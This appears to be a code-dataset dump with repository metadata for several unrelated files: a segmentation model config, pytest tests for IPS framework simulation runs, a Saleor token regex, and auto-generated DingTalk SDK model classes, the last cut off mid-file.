2021-07-26T08:01:55.000Z
|
2022-02-07T01:52:53.000Z
|
model/model_config.py
|
shijun18/TMLI-PLAN
|
0097d5674852eba75487b153600fc1cd5518b2a8
|
[
"MIT"
] | null | null | null |
model/model_config.py
|
shijun18/TMLI-PLAN
|
0097d5674852eba75487b153600fc1cd5518b2a8
|
[
"MIT"
] | 2
|
2022-02-28T07:13:12.000Z
|
2022-03-01T07:12:52.000Z
|
MODEL_CONFIG = {
'unet':{
'simplenet':{
'in_channels':1,
'encoder_name':'simplenet',
'encoder_depth':5,
'encoder_channels':[32,64,128,256,512], #[1,2,4,8,16]
'encoder_weights':None,
'decoder_use_batchnorm':True,
'decoder_attention_type':None,
'decoder_channels':[256,128,64,32], #[8,4,2,1]
'upsampling':1,
'classes':2,
'aux_classifier': False
},
'swin_transformer':{
'in_channels':1,
'encoder_name':'swin_transformer',
'encoder_depth':4,
'encoder_channels':[96,192,384,768], #[4,8,16,32]
'encoder_weights':None,
'decoder_use_batchnorm':True,
'decoder_attention_type':None,
'decoder_channels':[256,128,64], #[16,8,4]
'upsampling':4,
'classes':2,
'aux_classifier': False
},
'swinplusr18':{
'in_channels':1,
'encoder_name':'swinplusr18',
'encoder_depth':5,
'encoder_channels':[64,64,128,256,512], #[2,4,8,16,32]
'encoder_weights':None,
'decoder_use_batchnorm':True,
'decoder_attention_type':None,
'decoder_channels':[256,128,64,32], #[16,8,4,2]
'upsampling':2,
'classes':2,
'aux_classifier': False
}
},
# att unet
'att_unet':{
'simplenet':{
'in_channels':1,
'encoder_name':'simplenet',
'encoder_depth':5,
'encoder_channels':[32,64,128,256,512], #[1,2,4,8,16]
'encoder_weights':None,
'decoder_use_batchnorm':True,
'decoder_attention_type':None,
'decoder_channels':[256,128,64,32], #[8,4,2,1]
'upsampling':1,
'classes':2,
'aux_classifier': False
},
'swin_transformer':{
'in_channels':1,
'encoder_name':'swin_transformer',
'encoder_depth':4,
'encoder_channels':[96,192,384,768], #[4,8,16,32]
'encoder_weights':None,
'decoder_use_batchnorm':True,
'decoder_attention_type':None,
'decoder_channels':[256,128,64], #[16,8,4]
'upsampling':4,
'classes':2,
'aux_classifier': False
},
'resnet18':{
'in_channels':1,
'encoder_name':'resnet18',
'encoder_depth':5,
'encoder_channels':[64,64,128,256,512], #[2,4,8,16,32]
'encoder_weights':None,
'decoder_use_batchnorm':True,
'decoder_attention_type':None,
'decoder_channels':[256,128,64,32], #[16,8,4,2]
'upsampling':2,
'classes':2,
'aux_classifier': False
}
},
# res unet
'res_unet':{
'simplenet':{
'in_channels':1,
'encoder_name':'simplenet_res',
'encoder_depth':5,
'encoder_channels':[32,64,128,256,512], #[1,2,4,8,16]
'encoder_weights':None,
'decoder_use_batchnorm':True,
'decoder_attention_type':None,
'decoder_channels':[256,128,64,32], #[8,4,2,1]
'upsampling':1,
'classes':2,
'aux_classifier': False
},
'resnet18':{
'in_channels':1,
'encoder_name':'resnet18',
'encoder_depth':5,
'encoder_channels':[64,64,128,256,512], #[2,4,8,16,32]
'encoder_weights':None,
'decoder_use_batchnorm':True,
'decoder_attention_type':None,
'decoder_channels':[256,128,64,32], #[16,8,4,2]
'upsampling':2,
'classes':2,
'aux_classifier': False
},
'swinplusr18':{
'in_channels':1,
'encoder_name':'swinplusr18',
'encoder_depth':5,
'encoder_channels':[64,64,128,256,512], #[2,4,8,16,32]
'encoder_weights':None,
'decoder_use_batchnorm':True,
'decoder_attention_type':None,
'decoder_channels':[256,128,64,32], #[16,8,4,2]
'upsampling':2,
'classes':2,
'aux_classifier': False
}
},
# deeplabv3+
'deeplabv3+':{
'swinplusr18':{
'in_channels':1,
'encoder_name':'swinplusr18',
'encoder_weights':None,
'encoder_depth':5,
'encoder_channels':[64,64,128,256,512], #[2,4,8,16,32]
'encoder_output_stride':32, #[8,16,32]
'decoder_channels':256, #[4]
'decoder_atrous_rates':(12, 24, 36),
'upsampling':4,
'classes':2,
'aux_classifier': False
}
}
}
| 34.090909
| 67
| 0.489846
| 509
| 4,875
| 4.459725
| 0.100196
| 0.087225
| 0.048458
| 0.079295
| 0.944934
| 0.944934
| 0.944934
| 0.928634
| 0.886784
| 0.886784
| 0
| 0.125396
| 0.352205
| 4,875
| 143
| 68
| 34.090909
| 0.593414
| 0.050667
| 0
| 0.828571
| 0
| 0
| 0.394788
| 0.088599
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2ef48423560f58a00ccd135216e6bc0bac6865e7
| 14,022
|
py
|
Python
|
tests/multirun/test_basic_serial.py
|
ORNL-Fusion/IPS-framework
|
b91951032393cc15eb828cf787d583ea686204cc
|
[
"BSD-3-Clause"
] | null | null | null |
tests/multirun/test_basic_serial.py
|
ORNL-Fusion/IPS-framework
|
b91951032393cc15eb828cf787d583ea686204cc
|
[
"BSD-3-Clause"
] | null | null | null |
tests/multirun/test_basic_serial.py
|
ORNL-Fusion/IPS-framework
|
b91951032393cc15eb828cf787d583ea686204cc
|
[
"BSD-3-Clause"
] | null | null | null |
import os
import shutil
import glob
import pytest
from ipsframework import Framework
def copy_config_and_replace(infile, srcdir, tmpdir):
with open(os.path.join(srcdir, infile), "r") as fin:
with open(os.path.join(tmpdir, infile), "w") as fout:
for line in fin:
if line.startswith("SIM_ROOT"):
fout.write(f"SIM_ROOT = {tmpdir}/$SIM_NAME\n")
IPS_ROOT = os.path.abspath(os.path.join(srcdir, '..', '..'))
fout.write(f"IPS_ROOT = {IPS_ROOT}\n")
else:
fout.write(line)
@pytest.mark.skipif(not shutil.which('mpirun'), reason="requires mpirun")
def test_basic_serial1(tmpdir, capfd):
datadir = os.path.dirname(__file__)
copy_config_and_replace("basic_serial1.ips", datadir, tmpdir)
shutil.copy(os.path.join(datadir, "platform.conf"), tmpdir)
# setup 'input' files
os.system(f"cd {tmpdir}; touch file1 ofile1 ofile2 sfile1 sfile2")
framework = Framework(config_file_list=[os.path.join(tmpdir, 'basic_serial1.ips')],
log_file_name=os.path.join(tmpdir, 'test.log'),
platform_file_name=os.path.join(tmpdir, "platform.conf"),
debug=None,
verbose_debug=None,
cmd_nodes=0,
cmd_ppn=0)
framework.run()
# Check stdout
captured = capfd.readouterr()
captured_out = captured.out.split('\n')
assert captured_out[0].startswith("Starting IPS")
assert captured_out[1] == "Created <class 'small_worker.small_worker'>"
assert captured_out[2] == "Created <class 'medium_worker.medium_worker'>"
assert captured_out[3] == "Created <class 'large_worker.large_worker'>"
assert captured_out[4] == "small_worker : init() called"
assert captured_out[6] == "medium_worker : init() called"
assert captured_out[8] == "large_worker : init() called"
assert captured_out[10] == "Current time = 3.50"
assert captured_out[11] == "Current time = 3.60"
assert captured_out[12] == "Current time = 3.70"
# check files copied and created
driver_files = [os.path.basename(f) for f in glob.glob(str(tmpdir.join("test_basic_serial1_0/work/drivers_testing_basic_serial1_*/*")))]
for infile in ["file1", "ofile1", "ofile2", "sfile1", "sfile2"]:
assert infile in driver_files
small_worker_files = [os.path.basename(f) for f in glob.glob(str(tmpdir.join("test_basic_serial1_0/work/workers_testing_small_worker_*/*")))]
medium_worker_files = [os.path.basename(f) for f in glob.glob(str(tmpdir.join("test_basic_serial1_0/work/workers_testing_medium_worker_*/*")))]
large_worker_files = [os.path.basename(f) for f in glob.glob(str(tmpdir.join("test_basic_serial1_0/work/workers_testing_large_worker_*/*")))]
for outfile in ["my_out3.50", "my_out3.60", "my_out3.70"]:
assert outfile in small_worker_files
assert outfile in medium_worker_files
assert outfile in large_worker_files
# check contents of my_out files
for outfile in ["my_out3.50", "my_out3.60", "my_out3.70"]:
for worker in ["workers_testing_small_worker_2", "workers_testing_medium_worker_3"]:
with open(str(tmpdir.join("test_basic_serial1_0/work").join(worker).join(outfile)), 'r') as f:
lines = f.readlines()
assert "results = ['Rank 0 slept for 1.0 seconds']\n" in lines
worker = "workers_testing_large_worker_4"
with open(str(tmpdir.join("test_basic_serial1_0/work").join(worker).join(outfile)), 'r') as f:
lines = f.readlines()
assert "results = ['Rank 0 slept for 1.0 seconds', 'Rank 1 slept for 1.0 seconds']\n" in lines
# check sim log file
with open(str(tmpdir.join("test_basic_serial1_0").join("test_basic_serial1_0.log")), 'r') as f:
lines = f.readlines()
# remove timestamp
lines = [line[24:] for line in lines]
for worker in ["small_worker_2", "medium_worker_3", "large_worker_4"]:
for timestamp in ["3.50", "3.60", "3.70"]:
assert f'workers_testing_{worker} INFO Stepping Worker timestamp={timestamp}\n' in lines
@pytest.mark.skipif(not shutil.which('mpirun'), reason="requires mpirun")
def test_basic_serial_multi(tmpdir, capfd):
# This is the same as test_basic_serial1 except that 2 simulation files are use at the same time
datadir = os.path.dirname(__file__)
copy_config_and_replace("basic_serial1.ips", datadir, tmpdir)
copy_config_and_replace("basic_serial2.ips", datadir, tmpdir)
shutil.copy(os.path.join(datadir, "platform.conf"), tmpdir)
# setup 'input' files
os.system(f"cd {tmpdir}; touch file1 ofile1 ofile2 sfile1 sfile2")
framework = Framework(config_file_list=[os.path.join(tmpdir, 'basic_serial1.ips'),
os.path.join(tmpdir, 'basic_serial2.ips')],
log_file_name=os.path.join(tmpdir, 'test.log'),
platform_file_name=os.path.join(tmpdir, "platform.conf"),
debug=None,
verbose_debug=None,
cmd_nodes=0,
cmd_ppn=0)
framework.run()
# Check stdout
# skip checking the output because they sometimes write over the top of each other when running in parallel
"""
captured = capfd.readouterr()
captured_out = captured.out.split('\n')
assert captured_out[0] == "Created <class 'small_worker.small_worker'>"
assert captured_out[1] == "Created <class 'medium_worker.medium_worker'>"
assert captured_out[2] == "Created <class 'large_worker.large_worker'>"
assert captured_out[3] == "Created <class 'small_worker.small_worker'>"
assert captured_out[4] == "Created <class 'medium_worker.medium_worker'>"
assert captured_out[5] == "Created <class 'large_worker.large_worker'>"
assert captured_out[7] == "small_worker : init() called"
assert captured_out[9] == "small_worker : init() called"
assert captured_out[11] == "medium_worker : init() called"
assert captured_out[13] == "medium_worker : init() called"
assert captured_out[15] == "large_worker : init() called"
assert captured_out[17] == "large_worker : init() called"
assert captured_out[19] == "Current time = 1.00"
assert captured_out[20] == "Current time = 1.00"
assert captured_out[21] == "Current time = 2.00"
assert captured_out[22] == "Current time = 2.00"
assert captured_out[23] == "Current time = 3.00"
assert captured_out[24] == "Current time = 3.00"
"""
# check files copied and created
for no in ["1", "2"]:
# This should also work for 2
if no == "2":
continue
driver_files = [os.path.basename(f) for f in glob.glob(str(tmpdir.join(f"test_basic_serial{no}_0/work/drivers_testing_basic_serial1_*/*")))]
for infile in ["file1", "ofile1", "ofile2", "sfile1", "sfile2"]:
assert infile in driver_files
small_worker_files = [os.path.basename(f) for f in glob.glob(str(tmpdir.join(f"test_basic_serial{no}_0/work/workers_testing_small_worker_*/*")))]
medium_worker_files = [os.path.basename(f) for f in glob.glob(str(tmpdir.join(f"test_basic_serial{no}_0/work/workers_testing_medium_worker_*/*")))]
large_worker_files = [os.path.basename(f) for f in glob.glob(str(tmpdir.join(f"test_basic_serial{no}_0/work/workers_testing_large_worker_*/*")))]
for outfile in ["my_out3.50", "my_out3.60", "my_out3.70"]:
assert outfile in small_worker_files
assert outfile in medium_worker_files
assert outfile in large_worker_files
# check contents of my_out files
for outfile in ["my_out3.50", "my_out3.60", "my_out3.70"]:
for worker in ["workers_testing_small_worker_2", "workers_testing_medium_worker_3"]:
with open(str(tmpdir.join("test_basic_serial1_0/work").join(worker).join(outfile)), 'r') as f:
lines = f.readlines()
assert "results = ['Rank 0 slept for 1.0 seconds']\n" in lines
worker = "workers_testing_large_worker_4"
with open(str(tmpdir.join("test_basic_serial1_0/work").join(worker).join(outfile)), 'r') as f:
lines = f.readlines()
assert "results = ['Rank 0 slept for 1.0 seconds', 'Rank 1 slept for 1.0 seconds']\n" in lines
for outfile in ["my_out3.40", "my_out3.50", "my_out3.60"]:
for worker in ["workers_testing_small_worker_6", "workers_testing_medium_worker_7"]:
with open(str(tmpdir.join("test_basic_serial2_0/work").join(worker).join(outfile)), 'r') as f:
lines = f.readlines()
assert "results = ['Rank 0 slept for 1.0 seconds']\n" in lines
worker = "workers_testing_large_worker_8"
with open(str(tmpdir.join("test_basic_serial2_0/work").join(worker).join(outfile)), 'r') as f:
lines = f.readlines()
assert "results = ['Rank 0 slept for 1.0 seconds', 'Rank 1 slept for 1.0 seconds']\n" in lines
# check basic_serial1 sim log file
with open(str(tmpdir.join("test_basic_serial1_0").join("test_basic_serial1_0.log")), 'r') as f:
lines = f.readlines()
# remove timestamp
lines = [line[24:] for line in lines]
for worker in ["small_worker_2", "medium_worker_3", "large_worker_4"]:
for timestamp in ["3.50", "3.60", "3.70"]:
assert f'workers_testing_{worker} INFO Stepping Worker timestamp={timestamp}\n' in lines
# check basic_serial2 sim log file
with open(str(tmpdir.join("test_basic_serial2_0").join("test_basic_serial2_0.log")), 'r') as f:
lines = f.readlines()
# remove timestamp
lines = [line[24:] for line in lines]
for worker in ["small_worker_6", "medium_worker_7", "large_worker_8"]:
for timestamp in ["3.40", "3.50", "3.60"]:
assert f'workers_testing_{worker} INFO Stepping Worker timestamp={timestamp}\n' in lines
@pytest.mark.skipif(not shutil.which('mpirun'), reason="requires mpirun")
def test_basic_concurrent1(tmpdir, capfd):
datadir = os.path.dirname(__file__)
copy_config_and_replace("basic_concurrent1.ips", datadir, tmpdir)
shutil.copy(os.path.join(datadir, "platform.conf"), tmpdir)
# setup 'input' files
os.system(f"cd {tmpdir}; touch file1 ofile1 ofile2 sfile1 sfile2")
framework = Framework(config_file_list=[os.path.join(tmpdir, 'basic_concurrent1.ips')],
log_file_name=os.path.join(tmpdir, 'test.log'),
platform_file_name=os.path.join(tmpdir, "platform.conf"),
debug=None,
verbose_debug=None,
cmd_nodes=0,
cmd_ppn=0)
framework.run()
# Check stdout
captured = capfd.readouterr()
captured_out = captured.out.split('\n')
assert captured_out[0].startswith("Starting IPS")
assert captured_out[1] == "Created <class 'small_worker.small_worker'>"
assert captured_out[2] == "Created <class 'medium_worker.medium_worker'>"
assert captured_out[3] == "Created <class 'large_worker.large_worker'>"
assert captured_out[4] == "small_worker : init() called"
assert captured_out[6] == "medium_worker : init() called"
assert captured_out[8] == "large_worker : init() called"
assert captured_out[10] == "Current time = 3.50"
assert captured_out[11] == "nonblocking wait_call() invoked before call 10 finished"
assert captured_out[12] == "Current time = 3.60"
assert captured_out[13] == "nonblocking wait_call() invoked before call 13 finished"
assert captured_out[14] == "Current time = 3.70"
assert captured_out[15] == "nonblocking wait_call() invoked before call 16 finished"
# check files copied and created
driver_files = [os.path.basename(f) for f in glob.glob(str(tmpdir.join("test_basic_concurrent1_0/work/drivers_testing_basic_concurrent1_*/*")))]
for infile in ["file1", "ofile1", "ofile2", "sfile1", "sfile2"]:
assert infile in driver_files
small_worker_files = [os.path.basename(f) for f in glob.glob(str(tmpdir.join("test_basic_concurrent1_0/work/workers_testing_small_worker_*/*")))]
medium_worker_files = [os.path.basename(f) for f in glob.glob(str(tmpdir.join("test_basic_concurrent1_0/work/workers_testing_medium_worker_*/*")))]
large_worker_files = [os.path.basename(f) for f in glob.glob(str(tmpdir.join("test_basic_concurrent1_0/work/workers_testing_large_worker_*/*")))]
for outfile in ["my_out3.50", "my_out3.60", "my_out3.70"]:
assert outfile in small_worker_files
assert outfile in medium_worker_files
assert outfile in large_worker_files
# check contents of my_out files
for outfile in ["my_out3.50", "my_out3.60", "my_out3.70"]:
for worker in ["workers_testing_small_worker_2", "workers_testing_medium_worker_3"]:
with open(str(tmpdir.join("test_basic_concurrent1_0/work").join(worker).join(outfile)), 'r') as f:
lines = f.readlines()
assert "results = ['Rank 0 slept for 1.0 seconds']\n" in lines
worker = "workers_testing_large_worker_4"
with open(str(tmpdir.join("test_basic_concurrent1_0/work").join(worker).join(outfile)), 'r') as f:
lines = f.readlines()
assert "results = ['Rank 0 slept for 1.0 seconds', 'Rank 1 slept for 1.0 seconds']\n" in lines
# check sim log file
with open(str(tmpdir.join("test_basic_concurrent1_0").join("test_basic_concurrent1_0.log")), 'r') as f:
lines = f.readlines()
# remove timestamp
lines = [line[24:] for line in lines]
for worker in ["small_worker_2", "medium_worker_3", "large_worker_4"]:
for timestamp in ["3.50", "3.60", "3.70"]:
assert f'workers_testing_{worker} INFO Stepping Worker timestamp={timestamp}\n' in lines
| 50.438849
| 155
| 0.656254
| 1,970
| 14,022
| 4.447716
| 0.092386
| 0.059005
| 0.079548
| 0.038804
| 0.90436
| 0.880963
| 0.866697
| 0.811116
| 0.811116
| 0.773454
| 0
| 0.034267
| 0.213308
| 14,022
| 277
| 156
| 50.620939
| 0.76004
| 0.048852
| 0
| 0.703911
| 0
| 0.022346
| 0.337449
| 0.151819
| 0
| 0
| 0
| 0
| 0.26257
| 1
| 0.022346
| false
| 0
| 0.027933
| 0
| 0.050279
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d31440ed4e9fbf947a8c3d508857ceca16c6aead
| 113
|
py
|
Python
|
saleor/core/__init__.py
|
X10project/rob_photography
|
baaeed11e13d1f4977c24f5f6601b1c6fbcf39b5
|
[
"BSD-3-Clause"
] | 3
|
2015-12-30T19:06:27.000Z
|
2021-10-06T04:23:36.000Z
|
saleor/core/__init__.py
|
X10project/rob_photography
|
baaeed11e13d1f4977c24f5f6601b1c6fbcf39b5
|
[
"BSD-3-Clause"
] | null | null | null |
saleor/core/__init__.py
|
X10project/rob_photography
|
baaeed11e13d1f4977c24f5f6601b1c6fbcf39b5
|
[
"BSD-3-Clause"
] | 4
|
2019-09-17T11:39:41.000Z
|
2022-01-24T10:22:50.000Z
|
TOKEN_PATTERN = ('(?P<token>[0-9a-z]{8}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{4}'
'-[0-9a-z]{12})')
| 28.25
| 76
| 0.39823
| 24
| 113
| 1.833333
| 0.375
| 0.340909
| 0.454545
| 0.340909
| 0.431818
| 0.431818
| 0.431818
| 0.431818
| 0.431818
| 0.431818
| 0
| 0.175824
| 0.19469
| 113
| 3
| 77
| 37.666667
| 0.307692
| 0
| 0
| 0
| 0
| 0.5
| 0.633929
| 0.508929
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
d32980615396492dbc9c686b56facfbaafbfdd70
| 169,101
|
py
|
Python
|
dingtalk/python/alibabacloud_dingtalk/exclusive_1_0/models.py
|
aliyun/dingtalk-sdk
|
ab4f856b8cfe94f6b69f10a0730a2e5a7d4901c5
|
[
"Apache-2.0"
] | 15
|
2020-08-27T04:10:26.000Z
|
2022-03-07T06:25:42.000Z
|
dingtalk/python/alibabacloud_dingtalk/exclusive_1_0/models.py
|
aliyun/dingtalk-sdk
|
ab4f856b8cfe94f6b69f10a0730a2e5a7d4901c5
|
[
"Apache-2.0"
] | 1
|
2020-09-27T01:30:46.000Z
|
2021-12-29T09:15:34.000Z
|
dingtalk/python/alibabacloud_dingtalk/exclusive_1_0/models.py
|
aliyun/dingtalk-sdk
|
ab4f856b8cfe94f6b69f10a0730a2e5a7d4901c5
|
[
"Apache-2.0"
] | 5
|
2020-08-27T04:07:44.000Z
|
2021-12-03T02:55:20.000Z
|
# -*- coding: utf-8 -*-
# This file is auto-generated, don't edit it. Thanks.
from Tea.model import TeaModel
from typing import Dict, List, Any
class GetConferenceDetailHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetConferenceDetailResponseBodyMemberList(TeaModel):
def __init__(
self,
union_id: str = None,
name: str = None,
attend_duration: float = None,
staff_id: str = None,
):
# 用户uid
self.union_id = union_id
# 用户昵称
self.name = name
# 参会时长
self.attend_duration = attend_duration
# 员工id
self.staff_id = staff_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.union_id is not None:
result['unionId'] = self.union_id
if self.name is not None:
result['name'] = self.name
if self.attend_duration is not None:
result['attendDuration'] = self.attend_duration
if self.staff_id is not None:
result['staffId'] = self.staff_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('unionId') is not None:
self.union_id = m.get('unionId')
if m.get('name') is not None:
self.name = m.get('name')
if m.get('attendDuration') is not None:
self.attend_duration = m.get('attendDuration')
if m.get('staffId') is not None:
self.staff_id = m.get('staffId')
return self
class GetConferenceDetailResponseBody(TeaModel):
def __init__(
self,
conference_id: str = None,
title: str = None,
conf_start_time: float = None,
duration: float = None,
total_num: int = None,
attendee_num: int = None,
attendee_percentage: str = None,
caller_id: str = None,
caller_name: str = None,
member_list: List[GetConferenceDetailResponseBodyMemberList] = None,
):
# 会议ID
self.conference_id = conference_id
# 会议标题
self.title = title
# 开始时间
self.conf_start_time = conf_start_time
# 持续时间
self.duration = duration
# 会议人数
self.total_num = total_num
# 出席会议人数
self.attendee_num = attendee_num
# 出席率
self.attendee_percentage = attendee_percentage
# 发起人uid
self.caller_id = caller_id
# 发起人昵称
self.caller_name = caller_name
# 参会人员列表
self.member_list = member_list
def validate(self):
if self.member_list:
for k in self.member_list:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.conference_id is not None:
result['conferenceId'] = self.conference_id
if self.title is not None:
result['title'] = self.title
if self.conf_start_time is not None:
result['confStartTime'] = self.conf_start_time
if self.duration is not None:
result['duration'] = self.duration
if self.total_num is not None:
result['totalNum'] = self.total_num
if self.attendee_num is not None:
result['attendeeNum'] = self.attendee_num
if self.attendee_percentage is not None:
result['attendeePercentage'] = self.attendee_percentage
if self.caller_id is not None:
result['callerId'] = self.caller_id
if self.caller_name is not None:
result['callerName'] = self.caller_name
result['memberList'] = []
if self.member_list is not None:
for k in self.member_list:
result['memberList'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('conferenceId') is not None:
self.conference_id = m.get('conferenceId')
if m.get('title') is not None:
self.title = m.get('title')
if m.get('confStartTime') is not None:
self.conf_start_time = m.get('confStartTime')
if m.get('duration') is not None:
self.duration = m.get('duration')
if m.get('totalNum') is not None:
self.total_num = m.get('totalNum')
if m.get('attendeeNum') is not None:
self.attendee_num = m.get('attendeeNum')
if m.get('attendeePercentage') is not None:
self.attendee_percentage = m.get('attendeePercentage')
if m.get('callerId') is not None:
self.caller_id = m.get('callerId')
if m.get('callerName') is not None:
self.caller_name = m.get('callerName')
self.member_list = []
if m.get('memberList') is not None:
for k in m.get('memberList'):
temp_model = GetConferenceDetailResponseBodyMemberList()
self.member_list.append(temp_model.from_map(k))
return self
class GetConferenceDetailResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetConferenceDetailResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetConferenceDetailResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class GetUserAppVersionSummaryHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetUserAppVersionSummaryRequest(TeaModel):
def __init__(
self,
next_token: int = None,
max_results: int = None,
):
# 启始数据游标
self.next_token = next_token
# 每页包含的数据条数
self.max_results = max_results
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.next_token is not None:
result['nextToken'] = self.next_token
if self.max_results is not None:
result['maxResults'] = self.max_results
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('nextToken') is not None:
self.next_token = m.get('nextToken')
if m.get('maxResults') is not None:
self.max_results = m.get('maxResults')
return self
class GetUserAppVersionSummaryResponseBodyData(TeaModel):
def __init__(
self,
stat_date: str = None,
org_name: str = None,
client: str = None,
app_version: str = None,
user_cnt: float = None,
):
# 统计日期
self.stat_date = stat_date
# 组织名称
self.org_name = org_name
# 端信息
self.client = client
# 版本信息
self.app_version = app_version
# 用户数
self.user_cnt = user_cnt
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.stat_date is not None:
result['statDate'] = self.stat_date
if self.org_name is not None:
result['orgName'] = self.org_name
if self.client is not None:
result['client'] = self.client
if self.app_version is not None:
result['appVersion'] = self.app_version
if self.user_cnt is not None:
result['userCnt'] = self.user_cnt
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('statDate') is not None:
self.stat_date = m.get('statDate')
if m.get('orgName') is not None:
self.org_name = m.get('orgName')
if m.get('client') is not None:
self.client = m.get('client')
if m.get('appVersion') is not None:
self.app_version = m.get('appVersion')
if m.get('userCnt') is not None:
self.user_cnt = m.get('userCnt')
return self
class GetUserAppVersionSummaryResponseBody(TeaModel):
def __init__(
self,
data: List[GetUserAppVersionSummaryResponseBodyData] = None,
next_token: int = None,
has_more: bool = None,
):
# 用户版本分布情况列表
self.data = data
# 下一次请求的分页游标
self.next_token = next_token
# 是否有更多数据
self.has_more = has_more
def validate(self):
if self.data:
for k in self.data:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['data'] = []
if self.data is not None:
for k in self.data:
result['data'].append(k.to_map() if k else None)
if self.next_token is not None:
result['nextToken'] = self.next_token
if self.has_more is not None:
result['hasMore'] = self.has_more
return result
def from_map(self, m: dict = None):
m = m or dict()
self.data = []
if m.get('data') is not None:
for k in m.get('data'):
temp_model = GetUserAppVersionSummaryResponseBodyData()
self.data.append(temp_model.from_map(k))
if m.get('nextToken') is not None:
self.next_token = m.get('nextToken')
if m.get('hasMore') is not None:
self.has_more = m.get('hasMore')
return self
class GetUserAppVersionSummaryResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetUserAppVersionSummaryResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetUserAppVersionSummaryResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class DeleteCommentHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class DeleteCommentResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: bool = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
